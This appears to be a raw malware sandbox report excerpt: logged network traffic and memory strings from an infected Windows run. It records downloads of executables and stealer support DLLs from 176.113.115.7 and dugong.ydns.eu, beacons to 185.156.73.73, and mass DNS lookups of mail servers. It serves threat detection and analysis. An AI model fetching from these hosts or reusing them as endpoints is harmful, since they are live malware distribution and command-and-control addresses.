                                                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiVocsBCIWgzQEIjafNAQjcvc0BCJDKzQEIucrNAQir0c0BCIrTzQEIndbNAQin2M0BCPnA1BUY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                                Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiVocsBCIWgzQEIjafNAQjcvc0BCJDKzQEIucrNAQir0c0BCIrTzQEIndbNAQin2M0BCPnA1BUY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                                Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiUocsBCIWgzQEIjafNAQjcvc0BCLnKzQEIq9HNAQiK080BCJ3WzQEIp9jNAQj5wNQVGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                                Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKS1yQEIl7bJAQijtskBCKmdygEIr4fLAQiUocsBCIWgzQEIjafNAQjcvc0BCLnKzQEIq9HNAQiK080BCJ3WzQEIp9jNAQj5wNQVGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: GET /files/748049926/nhDLtPT.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET /files/5149365135/ILqcVeT.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET /files/koloples/vertualiziren.exe HTTP/1.1Host: 45.59.120.8
                                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: dugong.ydns.euConnection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /files/5149365135/rXOl0pp.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/sqlite3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/freebl3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/mozglue.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/msvcp140.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/nss3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/softokn3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/vcruntime140.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: dugong.ydns.euConnection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/sqlite3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: GET /success?substr=mixtwo&s=three&sub=non HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /info HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /update HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /success?substr=mixfour&s=three&sub=non HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /info HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /update HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/freebl3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/mozglue.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/msvcp140.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
                                                Source: global trafficDNS traffic detected: DNS query: cobolrationumelawrtewarms.com
                                                Source: global trafficDNS traffic detected: DNS query: dugong.ydns.eu
                                                Source: global trafficDNS traffic detected: DNS query: www.google.com
                                                Source: global trafficDNS traffic detected: DNS query: towerbingobongoboom.com
                                                Source: global trafficDNS traffic detected: DNS query: securesmtp.pttbsa.com
                                                Source: global trafficDNS traffic detected: DNS query: inspfin.fed.be
                                                Source: global trafficDNS traffic detected: DNS query: smtp.terre-net.fr
                                                Source: global trafficDNS traffic detected: DNS query: mail.gcl.aphp.fr
                                                Source: global trafficDNS traffic detected: DNS query: latecis.fr
                                                Source: global trafficDNS traffic detected: DNS query: dak-re.com
                                                Source: global trafficDNS traffic detected: DNS query: smtp.comcast.net
                                                Source: global trafficDNS traffic detected: DNS query: smtp.jubzpb.vop
                                                Source: global trafficDNS traffic detected: DNS query: secure.mharelick.net
                                                Source: global trafficDNS traffic detected: DNS query: mail.estrenar.com.co
                                                Source: global trafficDNS traffic detected: DNS query: mail.wasp.nav.mil
                                                Source: global trafficDNS traffic detected: DNS query: securesmtp.schmitt-wiesentheid.de
                                                Source: global trafficDNS traffic detected: DNS query: mail.bfaga.com
                                                Source: global trafficDNS traffic detected: DNS query: smtp.associatedprivate.cn
                                                Source: global trafficDNS traffic detected: DNS query: 888.COM
                                                Source: global trafficDNS traffic detected: DNS query: aspmx5.googlemail.com
                                                Source: global trafficDNS traffic detected: DNS query: smtp.virgilio.it
                                                Source: global trafficDNS traffic detected: DNS query: reseau-linux.fr
                                                Source: global trafficDNS traffic detected: DNS query: teleline.es
                                                Source: global trafficDNS traffic detected: DNS query: smtp.termiso.pt
                                                Source: global trafficDNS traffic detected: DNS query: out.saks.my.id
                                                Source: global trafficDNS traffic detected: DNS query: alt1.ap.email.fireeyecloud.com
                                                Source: global trafficDNS traffic detected: DNS query: tele2.fr
                                                Source: global trafficDNS traffic detected: DNS query: gre07.vas-server.cz
                                                Source: global trafficDNS traffic detected: DNS query: estvideo.fr
                                                Source: global trafficDNS traffic detected: DNS query: post.cz
                                                Source: global trafficDNS traffic detected: DNS query: out.bostonmarketing.org
                                                Source: global trafficDNS traffic detected: DNS query: secure.aecom.com
                                                Source: global trafficDNS traffic detected: DNS query: talk21.com
                                                Source: global trafficDNS traffic detected: DNS query: mail.xcz.com
                                                Source: global trafficDNS traffic detected: DNS query: stjoebruins.com
                                                Source: global trafficDNS traffic detected: DNS query: smtp.POP.COM.BR
                                                Source: global trafficDNS traffic detected: DNS query: ALT1.ASPMX.L.GOOGLE.COM
                                                Source: global trafficDNS traffic detected: DNS query: vorsin.net
                                                Source: global trafficDNS traffic detected: DNS query: gvnkva.com
                                                Source: global trafficDNS traffic detected: DNS query: gmbol.cem
                                                Source: global trafficDNS traffic detected: DNS query: chemringts.com
                                                Source: global trafficDNS traffic detected: DNS query: smtp.Studsandsuds.onmicrosoft.com
                                                Source: global trafficDNS traffic detected: DNS query: smtp.3a5r.com
                                                Source: global trafficDNS traffic detected: DNS query: secure.proton.me
                                                Source: global trafficDNS traffic detected: DNS query: earthlink.net
                                                Source: global trafficDNS traffic detected: DNS query: secure.temp2.club
                                                Source: global trafficDNS traffic detected: DNS query: aspmx3.googlemail.com
                                                Source: global trafficDNS traffic detected: DNS query: pinkinbox.org
                                                Source: global trafficDNS traffic detected: DNS query: mx1-us1.ppe-hosted.com
                                                Source: global trafficDNS traffic detected: DNS query: centrasep.com
                                                Source: global trafficDNS traffic detected: DNS query: sky.com
                                                Source: global trafficDNS traffic detected: DNS query: centrum.sk
                                                Source: global trafficDNS traffic detected: DNS query: citromail.hu
                                                Source: global trafficDNS traffic detected: DNS query: smtp.wemo-barbing.de
                                                Source: global trafficDNS traffic detected: DNS query: smtp.execpc.com
                                                Source: global trafficDNS traffic detected: DNS query: mail.ocens.com
                                                Source: global trafficDNS traffic detected: DNS query: abv.bg
                                                Source: global trafficDNS traffic detected: DNS query: smtp.manning.nottingham.sch.uk
                                                Source: global trafficDNS traffic detected: DNS query: aspmx.l.google.com
                                                Source: global trafficDNS traffic detected: DNS query: seznam.cz
                                                Source: global trafficDNS traffic detected: DNS query: us2.mx2.mailhostbox.com
                                                Source: global trafficDNS traffic detected: DNS query: smtp.siemens.com
                                                Source: global trafficDNS traffic detected: DNS query: mail.ashebe.cf
                                                Source: global trafficDNS traffic detected: DNS query: out.z7azw.com
                                                Source: global trafficDNS traffic detected: DNS query: out.mpundit.fr
                                                Source: global trafficDNS traffic detected: DNS query: securesmtp.windsorvoice.co.uk
                                                Source: global trafficDNS traffic detected: DNS query: mx1.mailchannels.net
                                                Source: global trafficDNS traffic detected: DNS query: smtp.aluno.ceiparaty.com.br
                                                Source: global trafficDNS traffic detected: DNS query: ivnffgsr.com
                                                Source: global trafficDNS traffic detected: DNS query: mail.ext.yousician.com
                                                Source: global trafficDNS traffic detected: DNS query: out.chat2play.com
                                                Source: global trafficDNS traffic detected: DNS query: carrollton.k12.mi.us
                                                Source: global trafficDNS traffic detected: DNS query: rotulon.com
                                                Source: global trafficDNS traffic detected: DNS query: 4prkrmmail.net
                                                Source: global trafficDNS traffic detected: DNS query: solcom.de
                                                Source: global trafficDNS traffic detected: DNS query: smtp.itpro.nl
                                                Source: global trafficDNS traffic detected: DNS query: smtp.oransd.fr
                                                Source: global trafficDNS traffic detected: DNS query: securesmtp.poocanoe.com
                                                Source: global trafficDNS traffic detected: DNS query: securesmtp.lexiconitkonsult.se
                                                Source: global trafficDNS traffic detected: DNS query: autopujcovna-golem.cz
                                                Source: global trafficDNS traffic detected: DNS query: out.guruku.id
                                                Source: global trafficDNS traffic detected: DNS query: pec.it
                                                Source: global trafficDNS traffic detected: DNS query: districtdesignnaples.com
                                                Source: global trafficDNS traffic detected: DNS query: out.keybusiness.fr
                                                Source: global trafficDNS traffic detected: DNS query: numeo.fr
                                                Source: global trafficDNS traffic detected: DNS query: out.telefonica.net
                                                Source: global trafficDNS traffic detected: DNS query: mail.PERUVIANA.PE
                                                Source: global trafficDNS traffic detected: DNS query: smtp.eadsimples.com.br
                                                Source: global trafficDNS traffic detected: DNS query: infonie.fr
                                                Source: global trafficDNS traffic detected: DNS query: securesmtp.barkernyc.com
                                                Source: global trafficDNS traffic detected: DNS query: reception01.mail-vert.fr
                                                Source: global trafficDNS traffic detected: DNS query: fix.zp.ua
                                                Source: global trafficDNS traffic detected: DNS query: out.nesjo.education
                                                Source: global trafficDNS traffic detected: DNS query: buckeyeexpress.com
                                                Source: global trafficDNS traffic detected: DNS query: securesmtp.c1jjpan.com
                                                Source: global trafficDNS traffic detected: DNS query: bbox.fr
                                                Source: global trafficDNS traffic detected: DNS query: excite.com
                                                Source: global trafficDNS traffic detected: DNS query: smtp.goskywest.com
                                                Source: global trafficDNS traffic detected: DNS query: marjana.ua
                                                Source: global trafficDNS traffic detected: DNS query: out.maplecrestpartners.com
                                                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: exarthynature.run
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 06 Mar 2025 07:10:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSgtbx97lgCHsSR4s3VYoEUxjVywwCRE9kpbe90WM9DGO1Tk6q%2FDbcCYcboGzIuvuN7GILQOBs5RQqBphV9ObE%2BQ6uFy93HwvmIDVeoegs21ig24%2F1%2FHo7yvEZ9AgvtJSHHA1g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91c009547e23741a-MIA
                                                Source: mshta.exe, 00000039.00000003.2227243376.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000039.00000003.2271287720.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000039.00000003.2214512864.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000039.00000002.2276451285.0000000002EC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.1
                                                Source: powershell.exe, 00000006.00000002.1356644306.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2152264674.0000000005861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2295199412.0000000005202000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2361011964.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.2361011964.0000000004CAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7
                                                Source: powershell.exe, 00000043.00000002.2345485955.0000000000A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe
                                                Source: powershell.exe, 00000023.00000002.2205159919.0000000008F10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.1130a
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cac.digicert.com/Di
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAss
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crt0
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                                Source: powershell.exe, 00000023.00000002.2188885216.0000000007AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                                Source: powershell.exe, 00000023.00000002.2188885216.0000000007AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.c
                                                Source: powershell.exe, 0000003A.00000002.2287824662.00000000031C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                                                Source: powershell.exe, 00000026.00000002.2212151636.000002143F2A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftSIt
                                                Source: powershell.exe, 00000043.00000002.2548889037.000000000717E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftm
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCe
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4Cod
                                                Source: nhDLtPT.exe, 00000014.00000002.1888085485.0000000004BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crl0
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.0000000001004000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.00000000010E7000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.000000000075E000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2378435053.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dugong.ydns.eu/
